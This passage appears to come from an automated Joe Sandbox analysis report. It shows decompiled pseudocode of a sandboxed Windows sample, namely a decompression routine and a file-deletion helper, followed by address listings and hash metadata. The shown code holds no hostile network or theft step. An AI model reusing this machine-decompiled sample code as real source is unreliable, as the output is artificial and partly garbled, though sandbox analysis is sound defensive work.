													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                    0x00000000
                                                    0x00407068
                                                    0x00407068
                                                    0x0040706c
                                                    0x00407095
                                                    0x0040709f
                                                    0x0040706e
                                                    0x00407077
                                                    0x00407084
                                                    0x00407087
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040741c
                                                    0x00407420
                                                    0x004075cf
                                                    0x004075e5
                                                    0x004075ed
                                                    0x004075f4
                                                    0x004075f6
                                                    0x004075fd
                                                    0x00407601
                                                    0x00407601
                                                    0x0040742c
                                                    0x00407433
                                                    0x0040743b
                                                    0x0040743e
                                                    0x00407441
                                                    0x00407441
                                                    0x00407447
                                                    0x00407447
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406bec
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x00000000
                                                    0x00406bfd
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c06
                                                    0x00406c09
                                                    0x00406c0c
                                                    0x00406c10
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c16
                                                    0x00406c19
                                                    0x00406c1b
                                                    0x00406c1c
                                                    0x00406c1f
                                                    0x00406c21
                                                    0x00406c22
                                                    0x00406c24
                                                    0x00406c27
                                                    0x00406c2c
                                                    0x00406c31
                                                    0x00406c3a
                                                    0x00406c4d
                                                    0x00406c50
                                                    0x00406c5c
                                                    0x00406c84
                                                    0x00406c86
                                                    0x00406c94
                                                    0x00406c94
                                                    0x00406c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c8b
                                                    0x00406c8c
                                                    0x00406c8c
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c62
                                                    0x00406c67
                                                    0x00406c67
                                                    0x00406c70
                                                    0x00406c78
                                                    0x00406c7b
                                                    0x00000000
                                                    0x00406c81
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c9e
                                                    0x00406c9e
                                                    0x00406ca2
                                                    0x0040754e
                                                    0x00000000
                                                    0x0040754e
                                                    0x00406cab
                                                    0x00406cbb
                                                    0x00406cbe
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc4
                                                    0x00406cc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cca
                                                    0x00406cd0
                                                    0x00406cfa
                                                    0x00406d00
                                                    0x00406d07
                                                    0x00000000
                                                    0x00406d07
                                                    0x00406cd6
                                                    0x00406cd9
                                                    0x00406cde
                                                    0x00406cde
                                                    0x00406ce9
                                                    0x00406cf1
                                                    0x00406cf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d39
                                                    0x00406d3f
                                                    0x00406d42
                                                    0x00406d4f
                                                    0x00406d57
                                                    0x004073cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0e
                                                    0x00406d0e
                                                    0x00406d12
                                                    0x0040755d
                                                    0x00000000
                                                    0x0040755d
                                                    0x00406d1e
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d2c
                                                    0x00406d2f
                                                    0x00406d32
                                                    0x00406d37
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d5f
                                                    0x00406d61
                                                    0x00406d64
                                                    0x00406dd5
                                                    0x00406dd8
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406dec
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00406d66
                                                    0x00406d6a
                                                    0x00406d6d
                                                    0x00406d6f
                                                    0x00406d72
                                                    0x00406d75
                                                    0x00406d77
                                                    0x00406d7a
                                                    0x00406d7c
                                                    0x00406d81
                                                    0x00406d84
                                                    0x00406d87
                                                    0x00406d8b
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9c
                                                    0x00406da0
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406dac
                                                    0x00406daf
                                                    0x00406dcd
                                                    0x00406dcf
                                                    0x00000000
                                                    0x00406db1
                                                    0x00406db1
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc4
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406ffe
                                                    0x00407002
                                                    0x00407020
                                                    0x00407023
                                                    0x0040702a
                                                    0x0040702d
                                                    0x00407030
                                                    0x00407033
                                                    0x00407036
                                                    0x00407039
                                                    0x0040703b
                                                    0x00407042
                                                    0x00407043
                                                    0x00407045
                                                    0x00407048
                                                    0x0040704b
                                                    0x0040704e
                                                    0x0040704e
                                                    0x00407053
                                                    0x00000000
                                                    0x00407053
                                                    0x00407004
                                                    0x00407007
                                                    0x0040700a
                                                    0x00407014
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004070ab
                                                    0x004070af
                                                    0x00000000
                                                    0x00000000
                                                    0x004070b5
                                                    0x004070b9
                                                    0x00000000
                                                    0x00000000
                                                    0x004070bf
                                                    0x004070c1
                                                    0x004070c5
                                                    0x004070c5
                                                    0x004070c8
                                                    0x004070cc
                                                    0x00000000
                                                    0x00000000
                                                    0x0040711c
                                                    0x00407120
                                                    0x00407127
                                                    0x0040712a
                                                    0x0040712d
                                                    0x00407137
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00407122
                                                    0x00000000
                                                    0x00000000
                                                    0x00407143
                                                    0x00407147
                                                    0x0040714e
                                                    0x00407151
                                                    0x00407154
                                                    0x00407149
                                                    0x00407149
                                                    0x00407149
                                                    0x00407157
                                                    0x0040715a
                                                    0x0040715d
                                                    0x0040715d
                                                    0x00407160
                                                    0x00407163
                                                    0x00407166
                                                    0x00407166
                                                    0x00407169
                                                    0x00407170
                                                    0x00407175
                                                    0x00000000
                                                    0x00000000
                                                    0x00407203
                                                    0x00407203
                                                    0x00407207
                                                    0x004075a5
                                                    0x00000000
                                                    0x004075a5
                                                    0x0040720d
                                                    0x00407210
                                                    0x00407213
                                                    0x00407217
                                                    0x0040721a
                                                    0x00407220
                                                    0x00407222
                                                    0x00407222
                                                    0x00407222
                                                    0x00407225
                                                    0x00407228
                                                    0x00000000
                                                    0x00000000
                                                    0x00406df8
                                                    0x00406df8
                                                    0x00406dfc
                                                    0x00407569
                                                    0x00000000
                                                    0x00407569
                                                    0x00406e02
                                                    0x00406e05
                                                    0x00406e08
                                                    0x00406e0c
                                                    0x00406e0f
                                                    0x00406e15
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e1a
                                                    0x00406e1d
                                                    0x00406e1d
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e29
                                                    0x00406e2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e35
                                                    0x00406e35
                                                    0x00406e39
                                                    0x00406e3c
                                                    0x00406e3f
                                                    0x00406e42
                                                    0x00406e45
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4b
                                                    0x00406e51
                                                    0x00406e54
                                                    0x00406e57
                                                    0x00406e5a
                                                    0x00406e5d
                                                    0x00406e60
                                                    0x00406e63
                                                    0x00406e7f
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e88
                                                    0x00406e8f
                                                    0x00406e93
                                                    0x00406e95
                                                    0x00406e99
                                                    0x00406e65
                                                    0x00406e65
                                                    0x00406e69
                                                    0x00406e71
                                                    0x00406e76
                                                    0x00406e78
                                                    0x00406e7a
                                                    0x00406e7a
                                                    0x00406e9c
                                                    0x00406ea3
                                                    0x00406ea6
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eb1
                                                    0x00406eb1
                                                    0x00406eb5
                                                    0x00407575
                                                    0x00000000
                                                    0x00407575
                                                    0x00406ebb
                                                    0x00406ebe
                                                    0x00406ec1
                                                    0x00406ec5
                                                    0x00406ec8
                                                    0x00406ece
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed3
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406edc
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ede
                                                    0x00406ee1
                                                    0x00406ee4
                                                    0x00406ee7
                                                    0x00406eea
                                                    0x00406eed
                                                    0x00406ef0
                                                    0x00406ef3
                                                    0x00406ef6
                                                    0x00406ef9
                                                    0x00406efc
                                                    0x00406f14
                                                    0x00406f17
                                                    0x00406f1a
                                                    0x00406f1d
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f24
                                                    0x00406f26
                                                    0x00406efe
                                                    0x00406efe
                                                    0x00406f06
                                                    0x00406f0b
                                                    0x00406f0d
                                                    0x00406f0f
                                                    0x00406f0f
                                                    0x00406f29
                                                    0x00406f30
                                                    0x00406f33
                                                    0x00000000
                                                    0x00406f35
                                                    0x00000000
                                                    0x00406f35
                                                    0x00406f33
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f75
                                                    0x00406f75
                                                    0x00406f79
                                                    0x00407581
                                                    0x00000000
                                                    0x00407581
                                                    0x00406f7f
                                                    0x00406f82
                                                    0x00406f85
                                                    0x00406f89
                                                    0x00406f8c
                                                    0x00406f92
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f97
                                                    0x00406f9a
                                                    0x00406f9a
                                                    0x00406fa0
                                                    0x00406f3e
                                                    0x00406f3e
                                                    0x00406f41
                                                    0x00000000
                                                    0x00406f41
                                                    0x00406fa2
                                                    0x00406fa2
                                                    0x00406fa5
                                                    0x00406fa8
                                                    0x00406fab
                                                    0x00406fae
                                                    0x00406fb1
                                                    0x00406fb4
                                                    0x00406fb7
                                                    0x00406fba
                                                    0x00406fbd
                                                    0x00406fc0
                                                    0x00406fd8
                                                    0x00406fdb
                                                    0x00406fde
                                                    0x00406fe1
                                                    0x00406fe1
                                                    0x00406fe4
                                                    0x00406fe8
                                                    0x00406fea
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fca
                                                    0x00406fcf
                                                    0x00406fd1
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406fed
                                                    0x00406ff4
                                                    0x00406ff7
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00407286
                                                    0x00407286
                                                    0x0040728a
                                                    0x004075b1
                                                    0x00000000
                                                    0x004075b1
                                                    0x00407290
                                                    0x00407293
                                                    0x00407296
                                                    0x0040729a
                                                    0x0040729d
                                                    0x004072a3
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407056
                                                    0x00407056
                                                    0x00407059
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x00000000
                                                    0x00407395
                                                    0x00407399
                                                    0x004073bb
                                                    0x004073be
                                                    0x004073c8
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x004073cb
                                                    0x0040739b
                                                    0x0040739e
                                                    0x004073a2
                                                    0x004073a5
                                                    0x004073a5
                                                    0x004073a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407452
                                                    0x00407456
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x0040747b
                                                    0x00407482
                                                    0x00407489
                                                    0x00407489
                                                    0x00000000
                                                    0x00407489
                                                    0x00407458
                                                    0x0040745b
                                                    0x0040745e
                                                    0x00407461
                                                    0x00407468
                                                    0x004073ac
                                                    0x004073ac
                                                    0x004073af
                                                    0x00000000
                                                    0x00000000
                                                    0x00407543
                                                    0x00407546
                                                    0x00407447
                                                    0x00000000
                                                    0x00000000
                                                    0x0040717d
                                                    0x0040717f
                                                    0x00407186
                                                    0x00407187
                                                    0x00407189
                                                    0x0040718c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407194
                                                    0x00407197
                                                    0x0040719a
                                                    0x0040719c
                                                    0x0040719e
                                                    0x0040719e
                                                    0x0040719f
                                                    0x004071a2
                                                    0x004071a9
                                                    0x004071ac
                                                    0x004071ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040749f
                                                    0x0040749f
                                                    0x004074a3
                                                    0x004075db
                                                    0x00000000
                                                    0x004075db
                                                    0x004074a9
                                                    0x004074ac
                                                    0x004074af
                                                    0x004074b3
                                                    0x004074b6
                                                    0x004074bc
                                                    0x004074be
                                                    0x004074be
                                                    0x004074be
                                                    0x004074c1
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c7
                                                    0x004074c7
                                                    0x004074cb
                                                    0x0040752b
                                                    0x0040752e
                                                    0x00407533
                                                    0x00407534
                                                    0x00407536
                                                    0x00407538
                                                    0x0040753b
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x0040744d
                                                    0x00407447
                                                    0x004074cd
                                                    0x004074d3
                                                    0x004074d6
                                                    0x004074d9
                                                    0x004074dc
                                                    0x004074df
                                                    0x004074e2
                                                    0x004074e5
                                                    0x004074e8
                                                    0x004074eb
                                                    0x004074ee
                                                    0x00407507
                                                    0x0040750a
                                                    0x0040750d
                                                    0x00407510
                                                    0x00407514
                                                    0x00407516
                                                    0x00407516
                                                    0x00407517
                                                    0x0040751a
                                                    0x004074f0
                                                    0x004074f0
                                                    0x004074f8
                                                    0x004074fd
                                                    0x004074ff
                                                    0x00407502
                                                    0x00407502
                                                    0x0040751d
                                                    0x00407524
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x004071c2
                                                    0x004071c5
                                                    0x004071fb
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732e
                                                    0x0040732e
                                                    0x00407331
                                                    0x00407333
                                                    0x004075bd
                                                    0x00000000
                                                    0x004075bd
                                                    0x00407339
                                                    0x0040733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407342
                                                    0x00407346
                                                    0x00407349
                                                    0x00407349
                                                    0x00407349
                                                    0x00000000
                                                    0x00407349
                                                    0x004071c7
                                                    0x004071c9
                                                    0x004071cb
                                                    0x004071cd
                                                    0x004071d0
                                                    0x004071d1
                                                    0x004071d3
                                                    0x004071d5
                                                    0x004071d8
                                                    0x004071db
                                                    0x004071f1
                                                    0x004071f6
                                                    0x0040722e
                                                    0x0040722e
                                                    0x00407232
                                                    0x0040725e
                                                    0x00407260
                                                    0x00407267
                                                    0x0040726a
                                                    0x0040726d
                                                    0x0040726d
                                                    0x00407272
                                                    0x00407272
                                                    0x00407274
                                                    0x00407277
                                                    0x0040727e
                                                    0x00407281
                                                    0x004072ae
                                                    0x004072ae
                                                    0x004072b1
                                                    0x004072b4
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00000000
                                                    0x00407328
                                                    0x004072b6
                                                    0x004072bc
                                                    0x004072bf
                                                    0x004072c2
                                                    0x004072c5
                                                    0x004072c8
                                                    0x004072cb
                                                    0x004072ce
                                                    0x004072d1
                                                    0x004072d4
                                                    0x004072d7
                                                    0x004072f0
                                                    0x004072f2
                                                    0x004072f5
                                                    0x004072f6
                                                    0x004072f9
                                                    0x004072fb
                                                    0x004072fe
                                                    0x00407300
                                                    0x00407302
                                                    0x00407305
                                                    0x00407307
                                                    0x0040730a
                                                    0x0040730e
                                                    0x00407310
                                                    0x00407310
                                                    0x00407311
                                                    0x00407314
                                                    0x00407317
                                                    0x004072d9
                                                    0x004072d9
                                                    0x004072e1
                                                    0x004072e6
                                                    0x004072e8
                                                    0x004072eb
                                                    0x004072eb
                                                    0x0040731a
                                                    0x00407321
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x00000000
                                                    0x00407323
                                                    0x00000000
                                                    0x00407323
                                                    0x00407321
                                                    0x00407234
                                                    0x00407237
                                                    0x00407239
                                                    0x0040723c
                                                    0x0040723f
                                                    0x00407242
                                                    0x00407244
                                                    0x00407247
                                                    0x0040724a
                                                    0x0040724a
                                                    0x0040724d
                                                    0x0040724d
                                                    0x00407250
                                                    0x00407257
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x00000000
                                                    0x00407259
                                                    0x00000000
                                                    0x00407259
                                                    0x00407257
                                                    0x004071dd
                                                    0x004071e0
                                                    0x004071e2
                                                    0x004071e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f44
                                                    0x00406f44
                                                    0x00406f48
                                                    0x0040758d
                                                    0x00000000
                                                    0x0040758d
                                                    0x00406f4e
                                                    0x00406f51
                                                    0x00406f54
                                                    0x00406f57
                                                    0x00406f5a
                                                    0x00406f5d
                                                    0x00406f60
                                                    0x00406f62
                                                    0x00406f65
                                                    0x00406f68
                                                    0x00406f6b
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00000000
                                                    0x00000000
                                                    0x004070cf
                                                    0x004070cf
                                                    0x004070d3
                                                    0x00407599
                                                    0x00000000
                                                    0x00407599
                                                    0x004070d9
                                                    0x004070dc
                                                    0x004070df
                                                    0x004070e2
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e7
                                                    0x004070ea
                                                    0x004070ed
                                                    0x004070f0
                                                    0x004070f3
                                                    0x004070f6
                                                    0x004070f7
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070fc
                                                    0x004070ff
                                                    0x00407102
                                                    0x00407105
                                                    0x00407105
                                                    0x00407105
                                                    0x00407108
                                                    0x0040710a
                                                    0x0040710a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040734c
                                                    0x0040734c
                                                    0x0040734c
                                                    0x00407350
                                                    0x00000000
                                                    0x00000000
                                                    0x00407356
                                                    0x00407359
                                                    0x0040735c
                                                    0x0040735f
                                                    0x00407361
                                                    0x00407361
                                                    0x00407361
                                                    0x00407364
                                                    0x00407367
                                                    0x0040736a
                                                    0x0040736d
                                                    0x00407370
                                                    0x00407373
                                                    0x00407374
                                                    0x00407376
                                                    0x00407376
                                                    0x00407376
                                                    0x00407379
                                                    0x0040737c
                                                    0x0040737f
                                                    0x00407382
                                                    0x00407385
                                                    0x00407389
                                                    0x0040738b
                                                    0x0040738e
                                                    0x00000000
                                                    0x00407390
                                                    0x0040710d
                                                    0x0040710d
                                                    0x00000000
                                                    0x0040710d
                                                    0x0040738e
                                                    0x004075c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x004075fa
                                                    0x004075fa
                                                    0x00000000
                                                    0x004075fa
                                                    0x00407447
                                                    0x004073ce
                                                    0x004073cb

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                    • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                    • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                    • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 41%
                                                    			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                    0x00405d2d
                                                    0x00405d38
                                                    0x00405d3d
                                                    0x00405d6d
                                                    0x00000000
                                                    0x00405d6d
                                                    0x00405d44
                                                    0x00405d45
                                                    0x00405d4f
                                                    0x00405d47
                                                    0x00405d47
